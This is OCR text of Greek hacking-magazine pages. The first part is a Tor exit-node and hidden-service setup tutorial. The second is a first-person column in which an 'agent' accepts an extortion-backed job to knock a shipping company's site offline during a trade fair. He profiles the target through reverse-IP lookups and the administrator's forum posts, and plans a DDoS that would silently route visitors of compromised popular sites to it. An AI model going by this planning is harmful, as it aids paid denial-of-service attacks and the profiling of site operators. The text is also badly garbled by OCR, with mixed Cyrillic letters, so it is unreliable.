Mnette στο κύκλωμα, ενεργά! 
WP 


τις λύσεις nou βρήκε και κάθε ευτράπελο που του έτυχε (https://blog. 
torproject.org/blog/five-years-exit-node-operator). 


Εφόσον λοιπὸν αποφασίσουµε va γίνουμε Tor exit node, δεν θα χρεια- 
στεἰ καμία σύνθετη ρύθμιση. Προηγουμένως μετατρέψαμε το σύστημα 
σε relay και ката κἄποιο τρόπο έχουμε κάνει τη μισὴ δουλειά. Ουσιαστι- 
ка, ауто που πρέπει να κάνουμε тора εἶναι να επιλέξουμε τις δικτυακὲς 
θύρες µέσω των οποίων θα πραγματοποιείται η ἐξοδος апо то Tor στο 
Internet. Н προεπιλεγµένη ρύθμιση κὀβει κάθε εἶδους enikorvovia µε τον 
ἐξω κόσµο (όλα та port), αλλά αυτὸ μπορεἰ να αλλάξει εὐκολα. Αρκεἰ va 
εντοπἰσουµε τη γραμμὴ µε το ExitPolicy και va την κάνουμε κάπως ἐτσι: 


ExitPolicy accept *:* 


МЕ αυτἠ τη ρύθμιση =гитрёп=та! οποιουδήποτε εἶδους επικοινωνία, προς 
οποιαδήποτε διεύθυνση IP. Βέβαια, ὁπως αντιλαμβάνεστε, κἀτι τέτοιο 
δεν θα ἦταν софо апо μέρους µας. Кало εἶναι να μετριάσουμµε λἰγο την 
κατάσταση, επιτρέποντας ορισμένα μόνο εἰδη συνδέσεων κι απαγορεύο- 
ντας τα υπόλοιπα. Πα παράδειγµα, αν θέλουμε να κὀψουμετις συνδέσεις 
SSH (port 22) και να επιτρέψουμε κάθε ἄλλη, μπορούμε να γράψουμε 
кат! τἐτοιο: 


ExitPolicy reject *:22 
ExitPolicy accept *:* 


Παρατηρεἰστε от! οι κανόνες нас μπορούν va «απλωθούν» σε πολλὲς 
διαφορετικἐς δηλώσεις του ExitPolicy, σε αντίστοιχου πλήθους γραμμές. 
Επίσης, οι κανόνες δεν συμψηφίζονται αλλά o Tor server τους εξετάζει 
κάθε фора vav προς vav και µε τη σειρἁ nou τους έχουμε γράψει. Με 
алла λόγια, п сара που δηλώνουμε τους κανόνες παἰζει μεγάλο ρὀλο, 
διότι ισχύει πάντα ο πρώτος κανόνας που ταιριάζει µε το εκάστοτε αἰτημα. 
Δείτε το ακόλουθο παράδειγμα: 
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Παρολίγο сиџфо- 
ра! Αν αφήσουμε 
ελεύθερο ro Tor, 
δεν да δείξει ἐλεος 
ка! да προσπαθή- 
σει Và χρησιµοποι- 
ἠσει όσο περισ- 
σότερους πόρους 
μπορεί. Καημένο 
1Mbit upstream... 
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Ίσως το πιο ενδι- 
афёроу μέρος του 
άρθρου, тоила- 
χιστον για TOV 
ар@роурафо. Εδώ 
ορίζουμε та hidden 
services пои 0a 
Byaivouv an' rov 
κόμβο µας ;) 
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ExitPolicy accept *:* 
ExitPolicy reject *:22 
ExitPolicy reject *:21 


О πρώτος κανόνας περιγράφει κάθε εἶδος σύνδεσης, προς οποιαδήποτε 
διεύθυνση IP. Εξαιτίας της θέσης του, λοιπὸν, θα εφαρμόζεται πάντα! 
Ἔτσι, οι παραπάνω γραμμές ουσιαστικά επιτρέπουν ὀλες τις συνδέσεις 
και δεν μπλοκάρουν καμία. Οι δηλώσεις µε то reject δεν θα εφαρμόζονται 
пот. Па να λαμβάνονται υπόψη οι απαγορεύσεις, oi παραπάνω γραμμές 
θα έπρεπε να διαταχθούν κάπως έτσι: 


ExitPolicy reject *:21 
ExitPolicy reject *:22 
ExitPolicy accept *:* 


Τέλος, πρέπει να πούμε και кат! ακόμα. Па τη δήλωση των port μπορούμε 
να χρησιμοποιήσουμε ολόκληρες περιοχές τιμών, δηλώνοντας την κάτω 
και την ἄνω τιμή. Αντίστοιχα, yia τη δήλωση των διευθύνσεων, μπορού- 
µε να περιγράψουμε οποιαδήποτε περιοχἠ διευθύνσεων =утос κάποιου 
domain, µε τη χρήση του κατάλληλου mask. Δείτε το παράδειγµα και θα 
καταλάβετε: 


ExitPolicy accept 180.189.160.0/16:* 
ExitPolicy accept *:80 

ExitPolicy accept *:6660-6697 
ExitPolicy reject *:* 


О протос κανόνας επιτρέπει κάθε εἶδος σύνδεσης προς ὀλεςτις διευθύν- 
σεις IP του Ανατολικού Τιμόρ (και λίγες παραπάνω). О τρίτος κανόνας gni- 
τρέπει την επικοινωνἰα σε ὀλεςτις δικτυακές θύρες, οι οποίες χρησιµοποι- 
οὗνται апо τους IRC server. О δεύτερος και o τέταρτος ἐχουν профауй 
λειτουργία. Έτσι, η επικοινωνία µε μηχανήματα του Ανατολικού Τιμόρ θα 


Μπείτε στο κύκλωμα, ενεργά! 
Αα 


[7] http://0223of3bjxwzlxh4.onion/ T 


€> ὢ S| ofbjwah.onion с | [Bi - Startpage 


Hello, deltaHacker! 


πραγματοποιείται χωρὶς κανέναν περιορισμὀ. Επίσης, xopic περιορισμούς 
θα πραγματοποιούνται και οι συνδέσεις HTTP και IRC. Όλες οι υπόλοιπες 
θα anoppinrovrai! 


Κρατήστε τα ηνία 


Αν αφήσουμε ro πρὀγραμµα ανεξέλεγκτο, θα προσπαθήσει να δεσμεύει 
όλο µας ro bandwidth. Па va µην βρεθούμε npo εκπλήξεων οφεΐίλου- 
µε να λάβουμε τα µέτρα µας. Συγκεκριµένα, πρέπει να ελέγξουμε το 
ρυθμὀ μετάδοσης δεδομένων. Αυτὸ επιτυγχάνεται апо τις μεταβλητές 
RelayBandwidthRate και RelayBandwidthBurst, του αρχείου ρυθμίσε- 
ων. Αν υποθέσουμε от! η γραμμὴ µας υποστηρίζει 1Mbps upload, κάτι 
που *ornv праёп* μεταφράζεται σε περίπου 110KBps3, кало да ἠταν 
να ορίσουμε ro RelayBandwidthRate στα 50 КВ. Να δώσουμε στο Tor, 
δηλαδἠ, ro μισὸ περίπου upload bandwidth. Αντἰστοιχα, θα μπορούσαμε 
να ορἰσουµε ro RelayBandwidthBurst στα 80 ΚΒ, µιας και τουλάχιστον 
στιγμιαία θα μπορούμε να δώσουμε кат! παραπάνω. Βέβαια, σε кама nE- 
ρίπτωση δεν θα πρέπει να επιτρέψουμε το στραγγαλισμὀ της γραμμὴς. От 
σχετικές γραμμὲς του αρχείου ρυθµἰσεων εἶναι κάπως £rot: 


RelayBandwidthRate 50 KB 
RelayBandwidthBurst 80 KB 


Υπάρχουν και περιπτώσεις, στις οποίες o ρυθμὸς μετάδοσης δεδομένων 
δεν µας απασχολεἰ καθόλου. Ας υποθέσουμε от! έχουμε στήσει ἑναν Tor 
exit node σε κἀποιο VPS, κάπου στο μακρινὸ Τέξας. Αν o server δεν κάνει 
τίποτα ἄλλο, δεν υπάρχει κανένας λὀγος va περιορίσουµε ro bandwidth 
που ἐχει στη διἀθεσή του то Tor. Ωστόσο στην περίπτωση πολλών VPS 
υπάρχει ἑνας άλλος, σηµαντικὸς περιορισμός! Μιλάμε για то μέγιστο ὀγκο 
δεδομένων που επιτρέπεται να κατεβάζουμε στη διάρκεια ενὸς μήνα. 
Έστω от! TO δικὀ µας VPS ἐχει στη διἀθεσή του 500GB ахд μήνα. Па va 
εξασφαλίσουµε от! o Tor server δεν θα υπερβεί το ὁριο, πρέπει να βρούμε 
το μέγεθος AccountingMax (εντὸς του αρχείου torrc) και va το ορίσουμε 
κάπως £TOI: 


AccountingMax 495 GB 


To va διαθέσουµε και та 500 GB yia rov κόμβο, δεν θα ἦταν ιδιαίτερα 
ἐξυπνο. Εἶναι πολύ πιθανὀ να χρειαστούμε μερικὰ GB για δικἐς µας δου- 
λειὲς, κι εξάλλου δεν θα ἦταν φρόνιμο να φλερτάρουμε µε TO ὁριο και να 
ρισκάρουµε то μπλοκάρισµα του VPS µας. Τέλος, θα πρέπει να ορίσουμε 
κατάλληλα και το μέγεθος AccountingStart: 


AccountingStart month 00:00 
МЕ τη παραπάνω γραμμή εξασφαλἰζουμε от! о µετρητής δεδοµένων θα 
μηδενίζεται στην apyr| κάθε μήνα... 


3. Κάπου τόσο πιάνει ο γράφων, µε το 1ΜΡΙ που του ἐταξε o ISP του... 


Оп, για δες! 
Κάποιος, κάπου 
µακριά µπορεί 
να δει ro hidden 
service µας! 


WVHAGKER 
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Events (ITOR/ARM NOTICE - ERR): 


To arm µας δείχνει 
πολύ ὀμορφα 
κάποια апо τα 
OTGTIOTIKd TOU Тог 
node µας... 
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Πάνελ διαχείρισης 


Δε да ἦταν ωραίο να παρακολουθούμε ауа πάσα στιγμή την κίνηση του 
κόμβου µας; То geek που κρύβουμε μέσα µας πολύ θα ἦθελε να βλέπει 
--σε праүратіко xpóvo-- τις συνδέσεις µε άλλους χρήστες, την a&ionoi- 
non rou bandwidth και διάφορα άλλα μεγέθη. E, λοιπὀν, όλα αυτά τα 
πετυχαίνει το arm. Н εγκατἀστασήἠ του γίνεται πανεύκολα, ὁπως πάντα: 


sudo apt-get install tor-arm 


То arm συνδέεται στο tor και αντλεἰ δεδομένα σε σχέση µε τη ὅραστηρι- 
ὁτητα και την κατάσταση TOU server. Στη συνέχεια, φροντίζει να µας та 
παρουσιάσει ὀμορφα και τακτοποιημένα! Πα αρχή, θα χρειαστεί να ενερ- 
γοποιήσουµε την υποστήριξη rou агт апо το γνωστό αρχείο ρυθμίσεων 
TOU tor (/etc/tor/torrc). Ек=! θα πρέπει να ενεργοποιήσουµε τη γραµµή 
δήλωσης rou ControlPort. Ката τα γνωστά, αυτό γίνεται αφαιρώντας τον 
αρχικὀ χαρακτήρα της δίεσης апо τη σχετικἠ γραμμὴ. То ἴδιο πρέπει va 
κάνουμε και στη γραμμὴ µε то HashedControlPassword, λίγο парака- 
TO, ὥστε να εξασφαλἰσουµε τη στοιχειώδη προστασία της επικοινωνίας 
μεταξύ tor και arm. Αμέσως µετά μπορούμε να ξεκινήσουμε το νέο µας 
προγραμματάκι. 


sudo -u debian-tor агт 


Н παραπάνω γραμμὴ ξεκινά то arm, µε ra δικαιώματα του χρήστη debian- 
tor. Ὅπως αντιλαμβάνεστε, проката! yia ἑνα µέτρο ασφάλειας. О ou- 
γκεκριμένος λογαριασμὀς δημιουργείται αυτόματα ката την εγκατάσταση 
TOU Tor και ἐχει περιορισμένα δικαιώματα. Μπορείτε να δείτε τις πληρο- 
Φορίες που εμφανίζει το arm στη σχετικἠ εικόνα, αλλά θα σας προτείναμε 
να το δοκιμάσετε στο бико Tor exit node ;) 


ἥπείτε στο κύκλωμα, ενεργά! 
ИИ 


Tor hidden service 


Στα hidden services του δικτύου Tor αντιστοιχούν domain names µε την 
κατάληξη .onion. Πίσω апо ἑνα τέτοιο domain δεν βρίσκεται πάντα Kå- 
ποιος web server. Μπορούμε να σηκώσουμε οποιαδήποτε υπηρεσία. Στο 
пароу άρθρο, βέβαια, θα εστιάσουµε στο μακράν δημοφιλέστερο σενὰ- 
pio: Το στήσιμο ενὀς site στο deep web! Με апла λόγια, θα σηκώσουμε 
£vav web server o οποίος θα εξυπηρετεί συνδέσεις αποκλειστικἁ εντὸς 
του δικτύου Tor. Па ша ακόµα фора да ξεκινήσουμε µε τη ρύθμιση του 
Tor апо το γνωστὸ αρχείο (όχι, δεν да επαναλάβουμετο буора του). Тора 
θα εντοπίσουµε την περιοχἠ ρυθμίσεων που афора ora hidden services. 
Εκεἰ θα πρέπει να προσθέσουμε δύο μόλις γραμμές. Н µια καθορίζει την 
τοποθεσία ὀπου θα αποθηκεύονται οι πληροφορἱες για την υπηρεσία µας 
(λόγου χάρη το κλειδὶ της κρυπτογράφησης) και η ἄλλη θα καθορίζει δι- 
εὐθυνση και port, στα οποία θα ακούει η υπηρεσία: 


HiddenServiceDir /var/lib/tor/awesome service/ 
HiddenServicePort 80 127.0.0.1:80 


Ta σχετικἁ µε την υπηρεσία µας αρχεία, θα βρίσκονται στον κατάλογο / 
var/lib/tor/awesome. service. Καλὸ θα ἠταν να µη βγούμε εκτός του / 
var/lib/tor, Фот va µη μπλέκουμε µε δικαιώματα πρόσβασης. Тора, µπο- 
ρούμε να ασχοληθούμε µε την υπηρεσία µας καθεαυτἠ. Προφανώς, то 
прото βήμα εἰναι η εγκατάσταση ενός web server. Па ἑνα тапамо VM ἡ 
va кро VPS, о lighttpd αποτελεἰ την ιδανικἠ επιλογή: 


apt-get install lighttpd 


Πριν κάνουµε οτιδήποτε алло, кало θα ἦταν va επισκεφτούμε το ap- 
χεἰο ρυθµίσεων rou lighttpd (/etc/lighttpd/lighttpd.conf). Βλέπετε, για 
να εἶναι праунатка hidden η υπηρεσία, πρέπει va αναγκάσουµε rov web 
server v’ ακούει μόνο απὸ τη διεύθυνση 127.0.0.1. Па το σκοπὀ αυτό, 
ακριβώς πάνω апо τη γραμμὴ server.document-root, θα πρέπει va npo- 
σθέσουµε ro εξἠς: 


server.bind = "127.0.0.1" 


Εἱμαστε ἐτοιμοι! О server µας δεν σερβίρει σελίδες PHP, οὐτε έχει MySQL 
για αποθήκευση δεδοµένων, αλλά ола αυτά αποτελούν το θέμα ενός ἀλ- 
Лоо άρθρου. Σημασία ἐχει от! о web server εἶναι ἑτοιμος και περιμένει 
συνδέσεις апо το δίκτυο Tor. Па την ονομασία που αντιστοιχεἰ στο pn- 
хаупна µας μπορούμε va ανατρέξουµε στο αρχείο hostname, μέσα στον 
κατάλογο /var/lib/tor/awesome service. Με την ἴδια λογική, θα μπορού- 
cape να σηκώσουμε κι οποιαδήποτε ἄλλη υπηρεσία. 


Επίλογος 


Па αρκετούς χρήστες rou Internet, το δίκτυο Tor προσφἑρει ανωνυμία 
και ша σχετικἠ ελευθερἱα κινήσεων χωρὶς κανέναν ενδοιασμὀ. Ωστόσο, 
για πολλοὺς ανθρώπους το δίκτυο Tor αποτελεἰ το μοναδικὀ ασφαλές 
μέσο για την επικοινωνἱα µε τον ἐξω κόσμο. Πα παράδειγµα, σκεφτείτε 
τους κατοίκους της Συρίας, του Трау και της Αιγύπτου. Δημιουργώντας 
ἑναν Tor relay, δεν συνεισφἐρουµε γενικἁ και αφηρημένα στο δίκτυο 
αλλά ενδέχεται να παράσχουµε ша πολύτιμη υπηρεσία για πολύ κόσμο. 
Тара, αν κάποιοι "ἀλλοι” χρησιμοποιούν то Tor µε κακὲς προθέσεις, kpi- 
μα! Κόντρα στην παροιμία, εμεἰς δεν θα αφήσουμε να καούν και τα χλω- 
ра, μαζὶ µε τα ξερὰ. 
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Skill: Advanced 


Tags: DDOS, 
slashdot effect, 
reverse IP lookup, 
escaped code, 
auto-refreshing 


Αυτἠ τη фора, ο πράκτορας nou εργάζεται 
για την ομάδα WHITE βρέθηκε σε праунатка 
δύσκολη θέση. Н ομάδα ἐλαβε éva απειλητικὀ 

email, γραμμένο σε ἀπταιστα Ελληνικά, το 

οποίο απαιτούσε την πραγματοποίηση µιας 
επίθεσης DDoS. О практорас µας ένιωσε ὁτι 
απειλείται η μυστικότητα της ταυτότητάς TOU κι 
αναγκάστηκε να αναλάβει δράση... 


um 
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O ἀνθρωπός µας θορυβήθηκε. H απειλἠ προερχόταν апо Ελληνική εται- 
ρεἰα του χώρου ка! o ἰδιος εἶναι ἑνας апо τους λιγοστούς Έλληνες της 
ομάδας. Όπως καταλαβαίνετε, ανησύχησε για το ενδεχόμενο η απειλἠ 
να афора στο πρὀσωπόὀ rou. Φοβόταν μήπως ra τζιμάνια της εταιρείας 
εἶχαν εντοπίσει τη δράση του, εἶχαν μάθει ότι διοχετεύει πληροφορίες σε 
περιοδικὀ του χώρου ка! ἧταν ἐτοιμοι va τον ξεσκεπάσουν (Σ.τ.Ε. WTF?!) 
Ката κάποιον τρόπο, λοιπὸν, η απειλἠ που δέχτηκε η ομάδα αποτελούσε 
προσωπικό ζήτημα yia τον πράκτορα. Στη συνέχεια παραθέτουμε αυτού- 
σιο το απειλητικὀ email καθὼς και την πλέον πρὀσφατη αναφορά του 
ανθρώπου µας. 


Αϑήνα 15 Μαΐου 2012 
Αγαπητοί καλησπέρα σας, 


Εἴμαστε µια εταιρεία δικτυακή ασφάλειας. Ερχόµαστε σε επαφή μαζί σας εκ μέρους 
κάποιου μεγάλου πελάτη µας. 


Την Τετάρτη 6 Ιουνίου 2012 ξεκινάει µια παγκόσμια ναυτιλιακή έκθεση στην Ελλάδα, 
µε το όνοµα «Ποσειδώνια 2012». Oa ϑέλαμε αυτή την ηµεροµηνία και συγκεκριµένα 
τις ώρες 10.00 - 17.00, то site της εταιρίας ммм.************. ог να µην εἶναι 
προσθάσιµο, ούτε από το χώρο της έκδεσης, ούτε και από αλλού. Αν αυτό γίνει 
κατορϑωτό, εἴμαστε στην ευχάριστη ϑέση να σας πούμε ότι ο λογαριασμός σας ото 
dark-market да πιστωδεί µε 10.000 bitcoins (ήτοι 50.000€ περίπου). Ωστόσο, αν 
αποτύχετε, да θρεδούµε στη δυσάρεστη ϑέση να δημοσιεύσουμε πληροφορίες για την 
ομάδα σας. 


Γνωρίζουμε αρκετά καλά τη δράση σας και εἴμαστε σίγουροι ότι μπορείτε άνετα va 

φέρετε εις πέρας την αποστολή. Δεν да δεχτούμε καμία δικαιολογία! Για va µη vo- 
μίζετε ότι μπλοφάρουμε, έχουμε ταυτοποιήσει αρκετές IPs που χρησιμοποιείτε, όπως 
οι: 

Е. OE EE EIE ЖЖЖЖЖЖЖЖЖЖЖЖ και KKK KKK KKK KK 


Με τιµή, 


Ouáóa Ασφάλειας 
ЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖЖ 


Ауафора 


Ὅπως καταλαβαίνετε, та &ха па!&=!. Φοβόμουν μήπως κάποιος апо την 
εταιρεία ἐχει δει то delta κι έχει καταφέρει να συνδέσει τις αναφορὲς 
µου µε την πραγµατικἠ µου ταυτότητα. Το кало εἶναι ότι οι διευθύνσεις 
IP nou ανέφεραν δεν χρησιμοποιούνται апо εμένα. Πρὀκειται για VPN 
servers, τους οποίους χρησιμοποιούν τα ανώτερα κλιμάκια. Ποτὲ δεν ξὲ- 
ρεις, όμως! Επομένως, ἐκρινα σκόπιμο να αναλάβω εγὠ την επίθεση και 
va φροντἰσω για την απόλυτη επιτυχἰα της. Μόνο έτσι θα ησύχαζα... 


Αυτό που ζητούσαν οι τύποι ἧταν να ρίξουμε £va site ката την πρώτη 
μέρα της ναυτιλιακἠς έκθεσης. Υποθέτω от! проката! για το site κἀποιου 
ανταγωνιστή τους, αλλά αυτὲς οι λεπτομέρειες δεν µε απασχολούν ιδιαἰ- 
тєра. Πα μένα, το κύριο ζήτημα ἦταν να βρω ¿vav ἐξυπνο rpóno ὥστε va 
ολοκληρώσω την αποστολή χωρίς να θέσω σε κίνδυνο την ομάδα ἡ τον 
εαυτό µου. Στο νου µου γυρὀφερναν τα ακὀλουθα: 


74 


DDoS για то δικό σας калб! 
| 


(©) Applications Places 5 


domaintools.com 


Whois Record | Ste Profle Registration | Server Stats | My Whois 


Server Type: Apache/2.0.46 (Red Hat) 
IP Address: Reverse4P | Pig | DNSLookup | Traceroute 
ASN: 
IP Location: < Greece - Europlanet Communication Informatics 
Response Code: 200 
Domain Status: Registered And Active Website 


e Oa ἦταν φρόνιμο va µην =кӨёсо εκεἰνους που µας απειλούν. Au- 
τούς θέλω να τους ηρεμήσω και ох! να τους εξαγριώσω! Επομένως 
πρέπει va επιτεθὠ µε τέτοιο τρόπο στο site, ὥστε να µην φαίνεται 
от! проката! για εχθρικἠ ενέργεια. Аито σημαίνει от! η επίθεση σε 
DNS servers δεν παἰζει. 


ο Πίσω απὀ ro site θα υπάρχει σίγουρα µια ομάδα διαχειριστὠν και 
προγραμματιστῶν, η οποία αντιμετωπίζει ταχύτατα οποιοδἠπο- 
τε πρὀβλημα προκύπτει. Apa, η αλλαγἠ της κύριας σελἰδας (το 
deface) και γενικότερα η προσβολή rou nnyaiou κὠδικα των σχετι- 
κὠν εφαρμογών oro server, αποκλείονται. Αυτές οἱ δολιοφθορές, 
αν και θα μπορούσα va τις "φορτώσω” σε δικτυακούς ακτιβιστὲς 
όπως οι Ανώνυμοι, διορθώνονται πολύ γρήγορα ка! ro site θα ena- 
νέλθει πολὺ πριν το πέρας της ημέρας. 


ο Па να ολοκληρώσω την αποστολἠ µε επιτυχία, λοιπόν, πρέπει να 
δημιουργήσω στο site ἑνα πρὀβλημα ro onoio να απαιτεί τουλάχι- 
στον 7 µε 8 ὠρες για va λυθεἰ. 


Σκεπτόμενος τους παραπάνω περιορισμούς, κατέληξα στο Slashdot 
effect. Πρόκειται για την ξαφνική ка! τεράστια αὐξηση των επισκἑψε- 
ων προς vav web server. Αυτή η αύξηση της επισκεψιμότητας ἐχει σαν 
αποτέλεσµα την αδυναμία rou server va ανταποκριθεἰ στις αιτήσεις των 
επισκεπτών (client requests) και, τελικά, την πρακτικἠ απενεργοποίηση 
του συστήματος. Με λίγα λόγια, το σύστημα λυγἰζει unó το βάρος шас 
επἰθεσης Denial of Service (DoS attack) ἡ ακόµα χειρότερα µιας επίθεσης 
Distributed Denial of Service (DDoS). Αυτἠ η ιδέα ἐμοιαζε πολύ кал κι 
αποφάσισα να την υλοποιήσω. Στη συνέχεια θα παραθέσω òda τα βήματα 
που ακολούθησα και φυσικά θα εξηγήσω πλήρως το σκεπτικὀ µου. Ωστό- 
со, για ευνόητους λὀγους δεν проката! να αναφέρω καμία αληθινὴ διεύ- 
θυνση IP, ενώ yia то domain του θύματος θα χρησιμοποιώ то πλασματικὸ 
www.victim.gr. Μάλιστα, επειδἠ πολλοὶ αναγνώστες εἶναι ка! hackers, θα 
φροντἰσω va πειρἀξω ка! τις εικὀνες. Δεν πρέπει να εκθἐσω κανέναν και 
κυρίως να µην εκτεθῶ! 


Αναγνώριση στὀχου 


Ένα апо τα σημαντικότερα στάδια σε µια επιτυχημένη επἰθεση εἶναι εκεὶ- 
vo της συλλογής πληροφοριών για το στόχο. Όσα περισσότερα γνωρίζεις, 
τόσο το καλύτερο! Auró εἶναι προφανὲς, θα µου πεἰτε, алла εδὠ υπάρχει 
μια σηµαντικἠ λεπτομέρεια: Συχνὰ, μπορεὶς να μάθεις πολλά και onpa- 
утка πράγματα yia ἐναν server *ҳоріс̧* va rov окауаряс ἡ να ασχολη- 
θεὶς ἄμεσα μαζί του. Κάτι τέτοιο μπορεὶ να γίνει ψάχνοντας ото Internet 


τν 4) 09:52 


Εικόνα 1 

Το domaintools 
εἶναι поли χρήσιμο 
εργαλείο για την 
ασφαλή διερεύνη- 
ση ЕМОС στόχου. 
Το www.victim.gr 
εἶναι δηλωμένο σε 
γνωστή ελληνική 
εταιρία hosting. 


78 


WV'HAGIKER 


ÁN 


ἡ χρησιμοποιώντας δημόσια διαθέσιμες δικτυακὲς υπηρεσίες. AG µην ξε- 
φεύγω ὁμως апо το θέμα µας. Εγὠ &ха στη διἀθεσἠ µου µόνο το domain 
name ка! то прото που ἤθελα να μάθω ἦταν η αντίστοιχη διεύθυνση IP. 
Ἔτσι στράφηκα στο www.domaintools.com -- проката! για πρώτης τάξεως 
εργαλεἰο! Όπως φαίνεται ка! στην εικὀνα 1, ο στόχος µου Φιλοξενείται 
апо γνωστὴ ελληνική eraipia hosting. Επἰσης, φαίνεται от! о server Tp- 
χει RedHat, µε τον Apache 2.0.46. Όλα αυτά ἦταν ενδιαφἐροντα, αλλά 
δεν µου αρκούσαν. П’ αυτό, αµέσως μετὰ патпоа στο link Reverse ТР. Μ΄ 
αυτὸν τον τρόπο θα ἐβρισκα πόσα και noia ακόμα sites φιλοξενούνται 
στον ἰδιο server. Όπως βλέπετε στην εικὀνα 2, о server φιλοξενεὶ ПЕР! 
τα 1800 ακόµα sites. Αυτή η πληροφορία µε οδήγησε στο ασφαλές ou- 
рпёрасра от! ο στόχος µου φιλοξενείται σε περιβάλλον shared hosting κι 
ОХ! σε κἀποιον dedicated server. Auró ἦταν πολὺ ενθαρρυντικὀ! Ένα TÈ- 
ΤΟΙΟ περιβάλλον παρέχει σχετικἀ περιορισμένους πόρους σε κάθε domain 
που φιλοξενεί. Επιπρόσθετα, οι εταιρείες που παρέχουν αυτού το εἶδος 
hosting, προσπαθούν να διασφαλίζουν την αξιοπιστία των server τους 
НЕ κάθε τρόπο. Αυτό σημαίνει от! αν η κίνηση προς ¿va domain αυξηθεί 
anóropa και σε τεράστιο Варо, γεγονὸς nou θα έθετε σε κἰνδυνο τον 
server και την εξυπηρέτηση των υπόλοιπων sites, εἶναι πολύ πιθανὀ να 
διακόψουν πλήρως την επικοινωνία µε то "Gnuroyóvo" site. 


Ἐχοντας μάθει αρκετά праүрата για τον server, έπρεπε va διερευνήσω 
και то ἰδιο то Site. Αφού συνδέθηκα στο www.victim.gr, ἄρχισα να ψάχνω 
για οτιδήποτε да μπορούσε va µου pavzi χρήσιμο. Αρχικά, δεν ἐβρισκα 
τίποτα ενδιαφέρον: Υπήρχε µια βασική οθόνη υποδοχής, ἑνα banner µε 
va animated GIF και ἑνα μενού. Κάπου εκεί όμως βρήκα кат! nou θα 
μπορούσε va φανεὶ χρήσιμο: To link "Αναφορά στο Διαχειριστή”. Όταν то 
πάτησα, άνοιξε o default mail client που ¿xw σετάρει oro σὐστημά µου 
και στο πεδἰο του παραλήπτη φαινόταν η διεύθυνση етай του διαχειρι- 
OTI]: eimai-theosQvictim.gr (προφανώς, ἐχω αποκρύψει το праүратіко 
email rou διαχειριστἠ). Αυτή η διεύθυνση θα μπορούσε va µε οδηγήσει 
σε κρίσιμες πληροφορίες. Ἔτσι, την έδωσα αμέσως oro Google. Μετά 
апо λίγο ψάξιμο, βρήκα ёха link για то προφἰλ ενὸς χρήστη, σε κἀποιο 
γνωστό τεχνικό forum. О συγκεκριμένος χρήστης εἶχε δηλώσει στα OTOI- 
χεία του το εν Aóyo email! Όπως καταλαβαίνετε, αµέσως μετὰ άρχισα то 
ψάξιμο εντὸς του φόρουμ. О χρήστης εἶχε κάνει ερωτήσεις για το πόσο 
ασφαλές εἶναι ro share-hosting, στον host-provider ónou βρισκόταν ο 
στόχος µου. Επίσης, ρωτούσε αν θα ἦταν ασφαλέστερο και φτηνότερο va 
μεταφέρει το site σε κἄποιο VPS (Virtual Private Server). Αυτά τα post 
εἶχαν σχετικἀ πρὀσφατη ηµερομηνἰα, αλλά σύμφωνα pE TIG πληροφορίες 
μου το site βρισκόταν ακόµα σε shared hosting environment. Ἔπρεπε va 
συνεχίσω το “σκάψιμο” στο φόρουμ... 


Σύντομα βρήκα πολλά ακόµα posts, апо τα οποία ψάρεψα πολύτιμες πλη- 
ροφορἰες κι апёктпоа µια ολοκληρωμένη εικόνα για το στὀχο µου. Τελι- 
ка, δεν υπήρχε καμία ομάδα τεχνικών nico апо ro site. Н εταιρεία που το 
εἶχε κατασκευάσει εἶχε διακόψει την υποστήριξή του, καθὼς η ναυτιλιακἠ 
εἶχε αρνηθεἰ το ετήσιο συμβόλαιο συντήρησης. Το ἐβρισκαν ακριβὀ και 
εἶχαν αποφασίσει от! то site θα περνούσε στον ἐλεγχο κάποιων ἄλλων 
διαχειριστὠν. Όλα αυτά αποτελούσαν ευχάριστα νέα. Οἱ τεχνικοί που 
υποστήριζαν πλέον то site, δεν το εἶχαν κατασκευάσει και ката паса 
πιθανότητα δεν θα το γνώριζαν επαρκώς кала. Επομένως, да τους ἦταν 
δύσκολο να κάνουν γρήγορο ка! στοχευμένο trouble-shooting. Επίσης, 
апо τα διάφορα posts του διαχειριστή ἐμαθα от! η συγκεκριμένη ναυτι- 
λιακἠ ἦταν πολύ τσιγκούνα σε θέματα πληροφοριακἠς υποδομής. Αυτό 
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Reverse IP Lookup | АЦ Names Hosted at ап IP | DomainTools - Mozilla Firefox 


File Edit View History Bookmarks 


$) Reverse IP Lookup | All Ма... 


Tools Help 


[^] [$ www.domaintools.com/research/reverse-ip/?hostna 


» Retrieve a list of all domains using the same IP address as you, and sharing the same resources 
» Track down malicious behavior of phishing or scamming websites that reside on the same host. 
> Perform research on hosting or parking companies before you decide to make а switch. 


IP Address or Domain Name | 


— 


σήμαινε от! θα διέθετε και υπηρεσίες ανάλογης ποιότητας. Όλα кала, 
λοιπὀν! Εἶχα πέσει σε ша μεγάλη ελληνική ναυτιλιακή εταιρἰα, η οποία 
θεωρούσε τη φτηνή δικτυακή υποδομή «μαγκιά» και κέρδος. 


Zombie boxes 


Κάθε ομάδα blackhat nou σέβεται τον =аито της, διαθέτει µια στρατιὰ 
апо owned sites µε uynAr| μάλιστα επισκεψιμότητα. Αυτά τα sites χρη- 
σιμοποιούνται σε διάφορες βρὠμικες δουλειὲς και η ομάδα ra διαφυλάσ- 
сє σαν корп οφθαλμού! (Σ.τ.Ε. Ἡ ως κόρες οφθαλμών. Φαντάζομαι.) Па 
παράδειγµα, ενδέχεται κάποια ομάδα να ἐχει πρόσβαση µε δικαιώματα 
administrator στο т.дг (τυχαίο το παράδειγµα), στους servers της AOL 
(America Online) ἡ ακόµη και slashdot.com! Σκεφτείτε, тора, το εξής 
σενάριο: Ὅλοι ὁσοι επισκέπτονται κἄποιο апо τα παραπάνω δημοφιλή 
sites, να συνδέονται σιωπηρἁ (χωρίς να το θέλουν και xopic να το αντι- 
λαμβάνονται) στο www.victim.gr. Ας κάνουμε vav шкро υπολογισμὀ: 
Οι servers του in.gr ενδέχεται να δέχονται ἑως και 100 επισκέψεις TO 
δευτερόλεπτο (hits per second, hps). Αντίστοιχα, Οἱ servers της AOL va 
µπορεἰ να δέχονται μέχρι και 800hps, ενώ ro Shlashdot va φτάνει στα 
300hps. Av uno8£écouys от! όλοι οι επισκέπτες αυτών των Sites “περνάνε” 
και στο www.victim.gr, τότε о server nou το φιλοξενεί θα δεχτεἰ ξαφνικἀ 
1200hps. Μάλιστα, ὀλες о! συνδέσεις θα προέρχονται апо γνωστὲς και 
φαινομενικὰ αθώες διευθύνσεις IP: αυτἐς των “φαγωμένων” sites. 


